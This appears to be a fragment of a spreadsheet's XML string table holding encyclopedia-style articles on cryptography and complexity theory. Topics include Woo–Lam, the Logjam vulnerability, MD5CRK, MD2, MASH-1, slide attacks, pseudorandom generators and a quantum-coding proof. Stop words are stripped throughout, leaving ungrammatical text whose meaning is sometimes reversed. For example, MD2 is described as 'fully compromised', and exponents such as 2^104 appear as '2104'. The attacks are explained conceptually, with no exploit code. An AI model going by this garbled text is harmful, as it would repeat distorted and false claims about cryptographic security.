\left\{e_{a^{n}}\right\}\pr _{\mathcal {s}}\left\{e_{a^{n}}{\text{ uncorrectable }}{\mathcal {s}}\right\}+\epsilon .\end{aligned}}} first equality follows definition— {\displaystyle {\mathcal {i}}} indicator function equal {\displaystyle e_{a^{n}}} uncorrectable {\displaystyle {\mathcal {s}}} equal zero otherwise. first inequality follows, since correct typical errors atypical error negligible probability mass. second equality follows exchanging expectation sum. third equality follows expectation indicator function probability event selects occurs. continuing, {\displaystyle =\sum _{a^{n}\in t_{\delta }^{\mathbf ^{n}}}\pr \left\{e_{a^{n}}\right\}\pr _{\mathcal {s}}\left\{\exists e_{b^{n}}:b^{n}\in t_{\delta }^{\mathbf ^{n}},\ b^{n}\neq a^{n},\ e_{a^{n}}^{\dagger }e_{b^{n}}\in n\left({\mathcal {s}}\right)\backslash {\mathcal {s}}\right\}} {\displaystyle \leq \sum _{a^{n}\in t_{\delta }^{a^{n}}}\pr \left\{e_{a^{n}}\right\}\pr _{\mathcal {s}}\left\{\exists e_{b^{n}}:b^{n}\in t_{\delta }^{\mathbf ^{n}},\ b^{n}\neq a^{n},\ e_{a^{n}}^{\dagger }e_{b^{n}}\in n\left({\mathcal {s}}\right)\right\}} {\displaystyle =\sum _{a^{n}\in t_{\delta }^{\mathbf ^{n}}}\pr \left\{e_{a^{n}}\right\}\pr _{\mathcal {s}}\left\{\bigcup \limits _{b^{n}\in t_{\delta }^{\mathbf ^{n}},\ b^{n}\neq a^{n}}e_{a^{n}}^{\dagger }e_{b^{n}}\in n\left({\mathcal {s}}\right)\right\}} {\displaystyle \leq \sum _{a^{n},b^{n}\in t_{\delta }^{\mathbf ^{n}},\ b^{n}\neq a^{n}}\pr \left\{e_{a^{n}}\right\}\pr _{\mathcal {s}}\left\{e_{a^{n}}^{\dagger }e_{b^{n}}\in n\left({\mathcal {s}}\right)\right\}} {\displaystyle \leq \sum _{a^{n},b^{n}\in t_{\delta }^{\mathbf ^{n}},\ b^{n}\neq a^{n}}\pr \left\{e_{a^{n}}\right\}2^{-\left(n-k\right)}} {\displaystyle \leq 2^{2n\left[h\left(\mathbf \right)+\delta \right]}2^{-n\left[h\left(\mathbf \right)+\delta \right]}2^{-\left(n-k\right)}} {\displaystyle =2^{-n\left[1-h\left(\mathbf \right)-k/n-3\delta \right]}.} first equality follows error-correcting conditions quantum stabilizer code, {\displaystyle n\left({\mathcal {s}}\right)} normalizer {\displaystyle {\mathcal {s}}} first inequality follows ignoring potential degeneracy code—we consider error uncorrectable lies normalizer {\displaystyle n\left({\mathcal {s}}\right)} probability larger {\displaystyle n\left({\mathcal {s}}\right)\backslash {\mathcal {s}}\in n\left({\mathcal {s}}\right)} second equality follows realizing probabilities existence criterion union events equivalent. second inequality follows applying union bound. third inequality follows fact probability fixed operator {\displaystyle e_{a^{n}}^{\dagger }e_{b^{n}}} equal identity commuting stabilizer operators random stabilizer upper bounded follows: {\displaystyle _{\mathcal {s}}\left\{e_{a^{n}}^{\dagger }e_{b^{n}}\in n\left({\mathcal {s}}\right)\right\}={\frac {2^{n+k}-1}{2^{2n}-1}}\leq 2^{-\left(n-k\right)}.} reasoning random choice stabilizer code equivalent fixing operators {\displaystyle z_{1}} ..., {\displaystyle z_{n-k}} performing uniformly random clifford unitary. probability fixed operator commutes {\displaystyle {\overline {z}}_{1}} ..., {\displaystyle {\overline {z}}_{n-k}} number non-identity operators normalizer {\displaystyle 2^{n+k}-1} divided total number non-identity operators {\displaystyle 2^{2n}-1} after applying bound, exploit following typicality bounds: {\displaystyle \forall a^{n}\in t_{\delta }^{\mathbf ^{n}}:\pr \left\{e_{a^{n}}\right\}\leq 2^{-n\left[h\left(\mathbf \right)+\delta \right]},} {\displaystyle \left\vert t_{\delta }^{\mathbf ^{n}}\right\vert \leq 2^{n\left[h\left(\mathbf \right)+\delta \right]}.} conclude long rate {\displaystyle k/n=1-h\left(\mathbf \right)-4\delta expectation error probability becomes arbitrarily small, exists least choice stabilizer code bound error probability. also quantum computing references wilde, mark 2017, quantum information theory, cambridge university press, also available eprint arxiv:1106.1145</t>
  </si>
  <si>
    <t>Woo–Lam</t>
  </si>
  <si>
    <t>cryptography, woo–lam refers various computer network authentication protocols designed simon thomas woo. protocols enable communicating parties authenticate other's identity exchange session keys, involve trusted distribution center (kdc) negotiate parties. both symmetric-key public-key variants described. however, protocols suffer various security flaws, part described inefficient compared alternative authentication protocols. public-key protocol notation following notation used describe algorithm: {\displaystyle a,b} network nodes. {\displaystyle ku_{x}} public node {\displaystyle {\displaystyle kr_{x}} private {\displaystyle {\displaystyle n_{x}} nonce chosen {\displaystyle {\displaystyle id_{x}} unique identifier {\displaystyle {\displaystyle e_{k}} public-key encryption using {\displaystyle {\displaystyle s_{k}} digital signature using {\displaystyle {\displaystyle random session chosen kdc. {\displaystyle concatenation.it assumed parties know kdc's public key. message exchange {\displaystyle 1)a\rightarrow kdc:id_{a}||id_{b}} {\displaystyle 2)kdc\rightarrow a:s_{kr_{kdc}}[id_{b}||ku_{b}]} {\displaystyle 3)a\rightarrow b:e_{ku_{b}}[n_{a}||id_{a}]} {\displaystyle 4)b\rightarrow kdc:id_{b}||id_{a}||e_{ku_{kdc}}[n_{a}]} {\displaystyle 5)kdc\rightarrow b:s_{kr_{kdc}}[id_{a}||ku_{a}]||e_{ku_{b}}[s_{kr_{kdc}}[n_{a}||k||id_{b}||id_{a}]]} {\displaystyle 6)b\rightarrow a:e_{ku_{a}}[s_{kr_{kdc}}[n_{a}||k]||n_{b}]} {\displaystyle 7)a\rightarrow b:e_{k}[n_{b}]} original version protocol identifier {\displaystyle id_{a}} omitted lines account fact {\displaystyle n_{a}} unique among nonces generated parties. protocol revised authors spotted flaw algorithm. also kerberos needham–schroeder protocol otway–rees protocol references</t>
  </si>
  <si>
    <t>Logjam (computer security)</t>
  </si>
  <si>
    <t>logjam security vulnerability systems diffie–hellman exchange prime number. discovered team computer scientists publicly reported 2015. discoverers able demonstrate attack 512-bit export-grade) systems. they estimated state level attacker could 1024-bit systems, widely used, thereby allowing decryption significant fraction internet traffic. they recommended upgrading least 2048-bits shared prime systems. details diffie–hellman exchange depends security presumed difficulty solving discrete logarithm problem. authors took advantage fact number field sieve algorithm, generally effective method finding discrete logarithms, consists four large computational steps, first three depend order group specific number whose finite desired. results first three steps precomputed saved, used solve discrete problem prime group relatively short time. this vulnerability known early 1992. turns much internet traffic uses handful groups order 1024 bits less. approach enabled vulnerability authors demonstrated using man-in-the-middle network attacker downgrade transport layer security (tls) connection 512-bit export-grade cryptography, allowing read exchanged data inject data connection. affects https, smtps, imaps protocols, among others. authors needed several thousand cores week precompute data single 512-bit prime. once done, however, individual logarithms could solved minute using 18-core intel xeon cpus. cve-2015-4000.the authors also estimated feasibility attack 1024-bit diffie–hellman primes. design, many diffie–hellman implementations pre-generated prime field. this considered secure, since discrete problem still considered hard big-enough primes even group known reused. researchers calculated cost creating logjam precomputation 1024-bit prime hundreds millions usd, noted well within range fy2012 $10.5 billion u.s. consolidated cryptologic program (which includes nsa). because reuse primes, generating precomputation prime would break two-thirds vpns quarter servers globally. researchers noted attack fits claims leaked papers able break much current cryptography. they recommend using primes 2048 bits defense switching elliptic-curve diffie–hellman (ecdh). claims practical implications attack however disputed security researchers eyal ronen shamir paper "critical review imperfect forward secrecy". test tools tls-based services servers offering https checked vulnerability using scanners sslyze, qualys server test, immuniweb security test, ssltrust, cryptcheck, cyphercraft, testssl.sh keycdn.com scanner. servers tested using ssh-weak-dh tool. responses 2015, microsoft released patch internet explorer. june 2015, project provided patch logjam browser. june 2015, apple released patch yosemite operating system. june 2015, mozilla project released firefox browser. september 2015, google released chrome browser. december 2017, ietf published 8270 called "increase secure shell minimum recommended diffie-hellman modulus size 2048 bits". also beast (computer security) breach (security exploit) crime poodle server-gated cryptography references external links logjam attack p/poly: power precomputation-shtetl optimizedl</t>
  </si>
  <si>
    <t>MD5CRK</t>
  </si>
  <si>
    <t>cryptography, md5crk distributed effort (similar distributed.net) launched jean-luc cooke company, certainkey cryptosystems, demonstrate message digest algorithm insecure finding collision messages produce hash. project went live march 2004. project ended august 2004 researchers independently demonstrated technique generating collisions using analytical methods xiaoyun wang, feng, xuejia lai, certainkey awarded 10,000 canadian dollar prize wang, feng, discovery. technique called floyd's cycle-finding algorithm used find collision md5. algorithm described analogy random walk. using principle function finite number possible outputs placed feedback loop cycle, relatively small amount memory store outputs particular structures "markers" better detect marker "passed" before. these markers called distinguished points, point inputs produce output called collision point. md5crk considered point whose first bits zeroes distinguished point. complexity expected time find collision equal {\displaystyle 2^{n}} {\displaystyle number bits digest output. fact {\displaystyle 2^{n}! \over {(2^{n}-k)!\times {2^{n}}^{k}}} {\displaystyle number function outputs collected. project, probability success {\displaystyle computations approximated {\displaystyle \over {1-e^{k\times (1-k) \over 2^{n+1}}}} expected number computations required produce collision 128-bit message digest function thus: 1.17741 1.17741 {\displaystyle {1.17741\times 2^{n/2}}={1.17741\times 2^{64}}} give perspective this, using virginia tech's system maximum performance 12.25 teraflops, would take approximately 2.17 12.25 {\displaystyle {2.17\times 10^{19}/12.25\times 10^{12}\approx 1,770,000}} seconds weeks. commodity processors gigaflops would take 6,000 machines approximately amount time. also list distributed computing projects brute force attack references further reading paul oorschot; michael wiener. parallel collision search application hash functions discrete logarithms (pdf). conference computer communications security 1994. 210–218.</t>
  </si>
  <si>
    <t>MD2 (hash function)</t>
  </si>
  <si>
    <t>message-digest algorithm cryptographic hash function developed ronald rivest 1989. algorithm optimized 8-bit computers. specified ietf 1319. "md" stands "message digest". even though fully compromised, ietf retired "historic" status 2011, citing "signs weakness". deprecated favor sha-256 strong hashing algorithms.nevertheless, 2014, remained public infrastructures part certificates generated rsa. description 128-bit hash value message formed padding multiple block length (128 bits bytes) adding 16-byte checksum actual calculation, 48-byte auxiliary block 256-byte s-table. constants generated shuffling integers using variant durstenfeld's algorithm pseudorandom number generator based decimal digits (pi) (see nothing sleeve number). algorithm runs loop permutes byte auxiliary block times every input bytes processed. once blocks (lengthened) message processed, first partial block auxiliary block becomes hash value message. s-table values are: 0x29, 0x2e, 0x43, 0xc9, 0xa2, 0xd8, 0x7c, 0x01, 0x3d, 0x36, 0x54, 0xa1, 0xec, 0xf0, 0x06, 0x13, 0x62, 0xa7, 0x05, 0xf3, 0xc0, 0xc7, 0x73, 0x8c, 0x98, 0x93, 0x2b, 0xd9, 0xbc, 0x4c, 0x82, 0xca, 0x1e, 0x9b, 0x57, 0x3c, 0xfd, 0xd4, 0xe0, 0x16, 0x67, 0x42, 0x6f, 0x18, 0x8a, 0x17, 0xe5, 0x12, 0xbe, 0x4e, 0xc4, 0xd6, 0xda, 0x9e, 0xde, 0x49, 0xa0, 0xfb, 0xf5, 0x8e, 0xbb, 0x2f, 0xee, 0x7a, 0xa9, 0x68, 0x79, 0x91, 0x15, 0xb2, 0x07, 0x3f, 0x94, 0xc2, 0x10, 0x89, 0x0b, 0x22, 0x5f, 0x21, 0x80, 0x7f, 0x5d, 0x9a, 0x5a, 0x90, 0x32, 0x27, 0x35, 0x3e, 0xcc, 0xe7, 0xbf, 0xf7, 0x97, 0x03, 0xff, 0x19, 0x30, 0xb3, 0x48, 0xa5, 0xb5, 0xd1, 0xd7, 0x5e, 0x92, 0x2a, 0xac, 0x56, 0xaa, 0xc6, 0x4f, 0xb8, 0x38, 0xd2, 0x96, 0xa4, 0x7d, 0xb6, 0x76, 0xfc, 0x6b, 0xe2, 0x9c, 0x74, 0x04, 0xf1, 0x45, 0x9d, 0x70, 0x59, 0x64, 0x71, 0x87, 0x20, 0x86, 0x5b, 0xcf, 0x65, 0xe6, 0x2d, 0xa8, 0x02, 0x1b, 0x60, 0x25, 0xad, 0xae, 0xb0, 0xb9, 0xf6, 0x1c, 0x46, 0x61, 0x69, 0x34, 0x40, 0x7e, 0x0f, 0x55, 0x47, 0xa3, 0x23, 0xdd, 0x51, 0xaf, 0x3a, 0xc3, 0x5c, 0xf9, 0xce, 0xba, 0xc5, 0xea, 0x26, 0x2c, 0x53, 0x0d, 0x6e, 0x85, 0x28, 0x84, 0x09, 0xd3, 0xdf, 0xcd, 0xf4, 0x41, 0x81, 0x4d, 0x52, 0x6a, 0xdc, 0x37, 0xc8, 0x6c, 0xc1, 0xab, 0xfa, 0x24, 0xe1, 0x7b, 0x08, 0x0c, 0xbd, 0xb1, 0x4a, 0x78, 0x88, 0x95, 0x8b, 0xe3, 0x63, 0xe8, 0x6d, 0xe9, 0xcb, 0xd5, 0xfe, 0x3b, 0x00, 0x1d, 0x39, 0xf2, 0xef, 0xb7, 0x0e, 0x66, 0x58, 0xd0, 0xe4, 0xa6, 0x77, 0x72, 0xf8, 0xeb, 0x75, 0x4b, 0x0a, 0x31, 0x44, 0x50, 0xb4, 0x8f, 0xed, 0x1f, 0x1a, 0xdb, 0x99, 0x8d, 0x33, 0x9f, 0x11, 0x83, 0x14 hashes 128-bit (16-byte) hashes (also termed message digests) typically represented 32-digit hexadecimal numbers. following demonstrates 43-byte ascii input corresponding hash: md2("the quick brown jumps lazy dog") 03d85a0d629d2c442e987525319fc471 result avalanche effect md2, even small change input message (with overwhelming probability) result completely different hash. example, changing letter message results md2("the quick brown jumps lazy cog") 6b890c9292668cdbbfda00a4ebf31f05 hash zero-length string md2("") 8350e5a3e24c153df2275c9f80692773 security rogier chauvaud (1997) described collisions md2's compression function, although unable extend attack full md2. 2004, shown vulnerable preimage attack time complexity equivalent 2104 applications compression function. author concludes, "md2 longer considered secure one-way hash function". 2008, improvements preimage attack time complexity compression function evaluations memory requirements message blocks.in 2009, shown vulnerable collision attack time complexity 263.3 compression function evaluations memory requirements hash values. this slightly better birthday attack expected take 265.5 compression function evaluations.in 2009, security updates issued disabling openssl, gnutls, network security services. also hash function security summary comparison cryptographic hash functions sha-1 references further reading external links</t>
  </si>
  <si>
    <t>MASH-1</t>
  </si>
  <si>
    <t>cryptographic hash function mathematical algorithm), mash-1 (modular arithmetic secure hash) hash function based modular arithmetic. history despite many proposals, hash functions based modular arithmetic withstood attack, tend relatively inefficient. mash-1 evolved long line related proposals successively broken repaired. standard committee draft iso/iec 10118-4 (nov description mash-1 involves rsa-like modulus {\displaystyle whose bitlength affects security. {\displaystyle product prime numbers difficult factor, {\displaystyle unknown factorization, security based part difficulty extracting modular roots. {\displaystyle length message block bit. {\displaystyle chosen binary representation bits longer {\displaystyle typically {\displaystyle l&lt;|n|\leq l+16} message padded appending message length separated blocks {\displaystyle d_{1},\cdots ,d_{q}} length {\displaystyle l/2} from blocks {\displaystyle d_{i}} enlarged block {\displaystyle b_{i}} length {\displaystyle created placing four bits {\displaystyle d_{i}} lower half byte four bits value higher half. these blocks processed iteratively compression function: {\displaystyle h_{0}=iv} {\displaystyle h_{i}=f(b_{i},h_{i-1})=((((b_{i}\oplus h_{i-1})\vee e)^{e}{\bmod {n}}){\bmod {2}}^{l})\oplus h_{i-1};\quad i=1,\cdots where {\displaystyle e=15\cdot 2^{l-4}} {\displaystyle e=2} {\displaystyle \vee denotes bitwise {\displaystyle \oplus bitwise xor. from {\displaystyle h_{q}} calculated data blocks {\displaystyle d_{q+1},\cdots ,d_{q+8}} linear operations (where {\displaystyle denotes concatenation): {\displaystyle h_{q}=y_{1}\,\|\,y_{3}\,\|\,y_{0}\,\|\,y_{2};\quad |y_{i}|=l/4} {\displaystyle y_{i}=y_{i-1}\oplus y_{i-4};\quad i=4,\cdots ,15} {\displaystyle d_{q+i}=y_{2i-2}\,\|\,y_{2i-1};\quad i=1,\cdots these data blocks enlarged {\displaystyle b_{q+1},\cdots ,b_{q+8}} like above, compression process continues eight steps: {\displaystyle h_{i}=f(b_{i},h_{i-1});\quad i=q+1,\cdots ,q+8} finally hash value {\displaystyle h_{q+8}{\bmod {p}}} {\displaystyle prime number {\displaystyle 7\cdot 2^{l/2-3}&lt;p&lt;2^{l/2}} mash-2 there newer version algorithm called mash-2 different exponent. original {\displaystyle e=2} replaced {\displaystyle e=2^{8}+1} this difference versions. references menezes, oorschot, vanstone, handbook applied cryptography, isbn 0-8493-8523-7</t>
  </si>
  <si>
    <t>Parsimonious reduction</t>
  </si>
  <si>
    <t>computational complexity theory game complexity, parsimonious reduction transformation problem another reduction) preserves number solutions. informally, bijection respective sets solutions problems. general reduction problem {\displaystyle problem {\displaystyle transformation guarantees whenever {\displaystyle solution {\displaystyle also least solution vice versa. parsimonious reduction guarantees every solution {\displaystyle exists unique solution {\displaystyle vice versa. parsimonious reductions commonly used computational complexity proving hardness counting problems, counting complexity classes additionally, used game complexity, design hard puzzles unique solution, many types puzzles require. formal definition {\displaystyle instance problem {\displaystyle parsimonious reduction {\displaystyle problem {\displaystyle problem {\displaystyle reduction number solutions {\displaystyle equal number solutions problem {\displaystyle r(x)} reduction exists, oracle counts number solutions {\displaystyle r(x)} instance {\displaystyle design algorithm counts number solutions {\displaystyle corresponding instance {\displaystyle consequently, counting number solutions instances {\displaystyle hard, counting number solutions {\displaystyle must hard well. applications just many-one reductions important proving np-completeness, parsimonious reductions important proving completeness counting complexity classes because parsimonious reductions preserve property unique solution, also used game complexity, show hardness puzzles sudoku uniqueness solution important part definition puzzle.specific types parsimonious reductions defined computational complexity properties transformation algorithm. instance, polynomial-time parsimonious reduction transformation algorithm takes polynomial time. these types reduction used prove #p-completeness. parameterized complexity, parsimonious reductions used; parsimonious reductions whose transformation fixed-parameter tractable algorithm bounded parameter values bounded parameter values computable function.polynomial-time parsimonious reductions special case general class reductions counting problems, polynomial-time counting reductions.one common technique used proving reduction {\displaystyle parsimonious show bijection solutions {\displaystyle solutions {\displaystyle r(x)} guarantees number solutions problems same. examples parsimonious reduction proving #p-completeness class contains counting versions decision problems. given instance {\displaystyle decision problem {\displaystyle problem {\displaystyle \#x} asks number solutions problem {\displaystyle examples #p-completeness rely fact #sat #p-complete. #3sat this counting version 3sat. show boolean formula rewritten formula 3-cnf form. valid assignment boolean formula valid assignment corresponding 3-cnf formula, vice versa. hence, reduction preserves number satisfying assignments, parsimonious reduction. then, #sat #3sat counting equivalents, #3sat #p-complete well. planar #3sat this counting version planar 3sat. hardness reduction 3sat planar 3sat given lichtenstein additional property every valid assignment instance 3sat, unique valid assignment corresponding instance planar 3sat, vice versa. hence reduction parsimonious, consequently planar #3sat #p-complete. hamiltonian cycle counting version problem asks number hamiltonian cycles given directed graph. seta takahiro provided reduction 3sat problem restricted planar directed degree-3 graphs. reduction provides bijection solutions instance 3sat solutions instance hamiltonian cycle planar directed degree-3 graphs. hence reduction parsimonious hamiltonian cycle planar directed degree-3 graphs #p-complete. consequently, general version hamiltonian cycle problem must #p-complete well. shakashaka shakashaka example parsimonious reduction could used showing hardness logic puzzles. decision version problem asks whether solution given instance puzzle. counting version asks number distinct solutions problem. reduction planar 3sat given demaine, okamoto, uehara also provides bijection solutions instance planar 3sat solutions corresponding instance shakashaka. hence reduction parsimonious, counting version shakashaka #p-complete. references</t>
  </si>
  <si>
    <t>Generative Design in Minecraft</t>
  </si>
  <si>
    <t>gdmc (short generative design minecraft) programming competition create procedurally generated settlements minecraft. competition organized academics york university, university hertfordshire queen mary university london. organisers michael cerny green (new york university) christoph salge (university hertfordshire) rodrigo canaan (new york university) christian guckelsberger (queen mary university london) julian togelius (new york university) references external links official website generative design minecraft twitter</t>
  </si>
  <si>
    <t>Generalized inversive congruential pseudorandom numbers</t>
  </si>
  <si>
    <t>approach nonlinear congruential methods generating uniform pseudorandom numbers interval [0,1) inversive congruential generator prime modulus. generalization arbitrary composite moduli {\displaystyle m=p_{1},\dots p_{r}} arbitrary distinct primes {\displaystyle p_{1},\dots ,p_{r}\geq present here. {\displaystyle \mathbb _{m}=\{0,1,...,m-1\}} integers {\displaystyle a,b\in \mathbb _{m}} (a,m) generalized inversive congruential sequence {\displaystyle (y_{n})_{n\geqslant elements {\displaystyle \mathbb _{m}} defined {\displaystyle y_{0}={\rm {seed}}} {\displaystyle y_{n+1}\equiv ay_{n}^{\varphi (m)-1}+b{\pmod {m}}{\text{, }}n\geqslant {\displaystyle \varphi (m)=(p_{1}-1)\dots (p_{r}-1)} denotes number positive integers less relatively prime example take {\displaystyle 3\times 5\,a=2,b=3} {\displaystyle y_{0}=1} hence {\displaystyle \varphi (m)=2\times 4=8\,} sequence {\displaystyle (y_{n})_{n\geqslant 0}=(1,5,13,2,4,7,1,\dots maximum. result shows sequences closely related following inversive congruential sequence prime moduli. {\displaystyle 1\leq i\leq {\displaystyle \mathbb _{p_{i}}=\{0,1,\dots ,p_{i}-1\},m_{i}=m/p_{i}} {\displaystyle a_{i},b_{i}\in \mathbb _{p_{i}}} integers {\displaystyle a\equiv m_{i}^{2}a_{i}{\pmod {p_{i}}}\;{\text{and }}\;b\equiv m_{i}b_{i}{\pmod {p_{i}}}{\text{. {\displaystyle (y_{n})_{n\geqslant sequence elements {\displaystyle \mathbb _{p_{i}}} given assumed. {\displaystyle y_{n+1}^{(i)}\equiv a_{i}(y_{n}^{(i)})^{p_{i}-2}+b_{i}{\pmod {p_{i}}}\;{\text{, }}n\geqslant 0\;{\text{where}}\;y_{0}\equiv m_{i}(y_{0}^{(i)}){\pmod {p_{i}}}\;{\text{is assumed. theorem {\displaystyle (y_{n}^{(i)})_{n\geqslant {\displaystyle 1\leq i\leq defined above. then {\displaystyle y_{n}\equiv m_{1}y_{n}^{(1)}+m_{2}y_{n}^{(2)}+\dots +m_{r}y_{n}^{(r)}{\pmod {m}}.} this theorem shows implementation generalized inversive congruential generator possible, exact integer computations performed {\displaystyle \mathbb _{p_{1}},\dots ,\mathbb _{p_{r}}} {\displaystyle \mathbb _{m}.} proof: first, observe {\displaystyle m_{i}\equiv 0{\pmod {p_{j}}},\;{\text{for}}\;i\neq hence {\displaystyle y_{n}\equiv m_{1}y_{n}^{(1)}+m_{2}y_{n}^{(2)}+\dots +m_{r}y_{n}^{(r)}{\pmod {m}}} {\displaystyle y_{n}\equiv m_{i}(y_{n}^{(i)}){\pmod {p_{i}}}} {\displaystyle 1\leq i\leq shown induction {\displaystyle n\geqslant recall {\displaystyle y_{0}\equiv m_{i}(y_{0}^{(i)}){\pmod {p_{i}}}} assumed {\displaystyle 1\leq i\leq now, suppose {\displaystyle 1\leq i\leq {\displaystyle y_{n}\equiv m_{i}(y_{n}^{(i)}){\pmod {p_{i}}}} integer {\displaystyle n\geqslant then straightforward calculations fermat's theorem yield {\displaystyle y_{n+1}\equiv ay_{n}^{\varphi (m)-1}+b\equiv m_{i}(a_{i}m_{i}^{\varphi (m)}(y_{n}^{(i)})^{\varphi (m)-1}+b_{i})\equiv m_{i}(a_{i}(y_{n}^{(i)})^{p_{i}-2}+b_{i})\equiv m_{i}(y_{n+1}^{(i)}){\pmod {p_{i}}}} ,which implies desired result. generalized inversive congruential pseudorandom numbers well equidistributed dimension. reliable theoretical approach assessing statistical independence properties based discrepancy s-tuples pseudorandom numbers. discrepancy bounds generator notation {\displaystyle d_{m}^{s}=d_{m}(x_{0},\dots ,x_{m}-1)} {\displaystyle x_{n}=(x_{n},x_{n}+1,\dots ,x_{n}+s-1)} {\displaystyle [0,1)^{s}} generalized inversive congruential pseudorandom numbers {\displaystyle s\geq higher bound {\displaystyle s\geq then discrepancy {\displaystyle d_{m}^{s}} satisfies {\displaystyle d_{m}} {\displaystyle ^{s}} {\displaystyle m^{-1/2}} {\displaystyle ({\frac {2}{\pi {\displaystyle \log m+{\frac {7}{5}})^{s}} {\displaystyle \textstyle \prod _{i=1}^{r}(2s-2+s(p_{i})^{-1/2})+s_{m}^{-1}} generalized inversive congruential operator.lower bound: there exist generalized inversive congruential generators {\displaystyle d_{m}} {\displaystyle ^{s}} {\displaystyle {\frac {1}{2(\pi +2)}}} {\displaystyle m^{-1/2}} {\displaystyle \textstyle \prod _{i=1}^{r}({\frac {p_{i}-3}{p_{i}-1}})^{1/2}} dimension 2.for fixed number prime factors theorem shows {\displaystyle d_{m}^{(s)}=o(m^{-1/2}(\log m)^{s})} generalized inversive congruential sequence. case theorem implies exist generalized inversive congruential generators discrepancy {\displaystyle d_{m}^{(s)}} least order magnitude {\displaystyle m^{-1/2}} dimension {\displaystyle s\geq however, composed small primes, order magnitude {\displaystyle (\log m)/\log \log hence {\displaystyle \textstyle \prod _{i=1}^{r}(2s-2+s(p_{i})^{-1/2})=o{(m^{\epsilon })}} every {\displaystyle \epsilon therefore, obtains general case {\displaystyle d_{m}^{s}=o(m^{-1/2+\epsilon every {\displaystyle \epsilon since {\displaystyle \textstyle \prod _{i=1}^{r}((p_{i}-3)/(p_{i}-1))^{1/2}\geqslant 2^{-r/2}} similar arguments imply general case lower bound theorem least order magnitude {\displaystyle m^{-1/2-\epsilon every {\displaystyle \epsilon range magnitudes also finds discrepancy independent uniformly distributed random points almost always order magnitude {\displaystyle m^{-1/2}(\log \log m)^{1/2}} according iterated logarithm discrepancies. sense, generalized inversive congruential pseudo-random numbers model true random numbers closely. also pseudorandom number generator list random number generators linear congruential generator inversive congruential generator naor-reingold pseudorandom function references notes eichenauer-herrmann, jürgen (1994), generalized inversive congruential pseudorandom numbers (first ed.), american mathematical society, jstor 2153575</t>
  </si>
  <si>
    <t>Slide attack</t>
  </si>
  <si>
    <t>slide attack form cryptanalysis designed deal prevailing idea even weak ciphers become strong increasing number rounds, ward differential attack. slide attack works make number rounds cipher irrelevant. rather looking data-randomizing aspects block cipher, slide attack works analyzing schedule exploiting weaknesses break cipher. common keys repeating cyclic manner. attack first described david wagner alex biryukov. bruce schneier first suggested term slide attack them, used 1999 paper describing attack. requirements slide attack work cipher broken multiple rounds identical function. this probably means cyclic schedule. function must vulnerable known-plaintext attack. slide attack closely related related-key attack. idea slide attack roots paper published edna grossman bryant tuckerman technical report 1977. grossman tuckerman demonstrated attack weak block cipher named data seal (nds). attack relied fact cipher identical subkeys round, cipher cyclic schedule cycle key, makes early version slide attack. summary report, including description block cipher attack, given cipher systems (beker piper, 1982). actual attack first, introduce notation. section assume cipher takes blocks key-schedule using {\displaystyle k_{1}\cdots k_{m}} keys length. slide attack works breaking cipher identical permutation functions, this function consist round cipher; defined key-schedule. example, cipher uses alternating schedule switches {\displaystyle k_{1}} {\displaystyle k_{2}} round, function would consist rounds. each {\displaystyle k_{i}} appear least next step collect {\displaystyle 2^{n/2}} plaintext-ciphertext pairs. depending characteristics cipher fewer suffice, birthday problem {\displaystyle 2^{n/2}} needed. these pairs, denoted {\displaystyle (p,c)} used find slid pair denoted {\displaystyle (p_{0},c_{0})(p_{1},c_{1})} slid pair property {\displaystyle p_{0}=f(p_{1})} {\displaystyle c_{0}=f(c_{1})} once slid pair identified, cipher broken vulnerability known-plaintext attacks. easily extracted pairing. slid pair thought happens message application function ’slid’ encryption round attack gets name. process finding slid pair somewhat different cipher follows basic scheme. uses fact relatively easy extract iteration choose pair plaintext-ciphertext pairs, {\displaystyle (p_{0},c_{0})(p_{1},c_{1})} check keys corresponding {\displaystyle p_{0}=f(p_{1})} {\displaystyle c_{0}=f(c_{1})} are. keys match, slid pair; otherwise move next pair. with {\displaystyle 2^{n/2}} plaintext-ciphertext pairs slid pair expected, along small number false-positives depending structure cipher. false positives eliminated using keys different message-ciphertext pair encryption correct. probability wrong correctly encipher messages good cipher. sometimes structure cipher greatly reduces number plaintext-ciphertext pairs needed, thus also large amount work. clearest examples feistel cipher using cyclic schedule. reason given {\displaystyle p=(l_{0},r_{0})} search {\displaystyle p_{0}=(r_{0},l_{0}\bigoplus f(r_{0},k))} this reduces possible paired messages {\displaystyle 2^{n}} {\displaystyle 2^{n/2}} (since half message fixed) {\displaystyle 2^{n/4}} plaintext-ciphertext pairs needed order find slid pair. references henry beker fred piper (1982). cipher systems: protection communications. john wiley sons. 263–267. isbn 978-0-471-89192-5. (contains summary paper grossman tuckerman) alex biryukov david wagner (march 1999). slide attacks (pdf/postscript). international workshop fast software encryption (fse '99). rome: springer-verlag. 245–259. retrieved 2007-09-03. alex biryukov david wagner (may 2000). advanced slide attacks (pdf/postscript). advances cryptology, proceedings eurocrypt 2000. bruges: springer-verlag. 589–606. retrieved 2007-09-03. furuya (december 2001). slide attacks known-plaintext cryptanalysis (pdf). international conference information security cryptology (icisc 2001). seoul: springer-verlag. 214–225. retrieved 2007-09-03. biham (1994). "new types cryptanalytic attacks using related keys" (pdf/postscript). journal cryptology. (4): 229–246. citeseerx 10.1.1.48.8341. doi:10.1007/bf00203965. issn 0933-2790. s2cid 19776908. retrieved 2007-09-03. ciet, piret, quisquater (2002). "related-key slide attacks: analysis, connections, improvements" (pdf/postscript). retrieved 2007-09-04. {{cite journal}}: cite journal requires |journal= (help)cs1 maint: multiple names: authors list (link)</t>
  </si>
  <si>
    <t>Generic group model</t>
  </si>
  <si>
    <t>generic group model idealised cryptographic model, adversary given access randomly chosen encoding group, instead efficient encodings, used finite field elliptic curve groups used practice. model includes oracle executes group operation. this oracle takes encodings group elements input outputs encoding third element. group allow pairing operation operation would modeled additional oracle. main uses generic group model analyse computational hardness assumptions. analysis generic group model answer question: "what fastest generic algorithm breaking cryptographic hardness assumption". generic algorithm algorithm makes group operation, consider encoding group. this question answered discrete logarithm problem victor shoup using generic group model. other results generic group model instance. model also extended algebraic structures like rings.the generic group model suffers problems random oracle model. particular, shown using similar argument exist cryptographic schemes provably secure generic group model trivially insecure random group encoding replaced efficiently computable instantiation encoding function. references</t>
  </si>
  <si>
    <t>QUAD (cipher)</t>
  </si>
  <si>
